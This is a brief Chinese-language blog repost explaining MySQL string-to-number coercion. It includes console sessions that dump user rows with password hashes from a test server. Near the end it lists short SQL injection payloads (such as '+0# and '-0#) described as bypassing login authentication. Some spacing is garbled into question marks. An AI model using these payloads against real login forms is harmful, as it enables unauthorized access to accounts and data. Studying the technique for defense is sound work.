Abusing MySQL string arithmetic for tiny SQL injections
測試平臺:????backtrack r3x86
MYSQL版本:? mysql-5.1.63
mysql> select User,Password from user where User=0;
+------------------+-------------------------------------------+
| User???????????? | Password????????????????????????????????? |
+------------------+-------------------------------------------+
| root???????????? | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| root???????????? | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| root???????????? | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| debian-sys-maint | *8C4C424D182238AFBA8B217F692D07C952EF4087 |
+------------------+-------------------------------------------+
4 rows in set, 4 warnings (0.00 sec)
mysql> select User,Password from user where User='';
Empty set (0.00 sec)
mysql> select User,Password from user where User=NULL;
Empty set (0.01 sec)
mysql> select 'w'-'w';
+---------+
| 'w'-'w' |
+---------+
|?????? 0 |
+---------+
1 row in set, 2 warnings (0.00 sec)
mysql> select "w"-"w";
+---------+
| "w"-"w" |
+---------+
|?????? 0 |
+---------+
1 row in set, 2 warnings (0.01 sec)
光看上面的warnings有人可能不信,特作下面的驗證.
Query OK, 1 row affected, 2 warnings (0.01 sec)
Records: 1? Duplicates: 0? Warnings: 0
mysql> describe temptbl;
+-------+--------+------+-----+---------+-------+
| Field | Type?? | Null | Key | Default | Extra |
+-------+--------+------+-----+---------+-------+
| coll? | double | NO?? |???? | 0?????? |?????? |
+-------+--------+------+-----+---------+-------+
1 row in set (0.01 sec)
能完成數值類型轉換的表達式均可, 例如: select username,password from users where username= '' +0;
類似的”+0,”-0,”*0,”^0均可。 精簡payload可以繞過登錄認證:?‘+0#,’/1#,’^0,’-0#等等。
http://www.xaprb.com/blog/2008/08/13/how-to-emulate-the-typeof-function-in-mysql/
http://blog.kotowicz.net/2013/01/abusing-mysql-string-arithmetic-for.html
http://www.freebuf.com/articles/web/6894.html
總結
以上是生活随笔為你收集整理的Abusing MySQL string arithmetic for tiny SQL injections的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: IE8,9,10下table th不显示
- 下一篇: navicat数据库密码忘记如何解决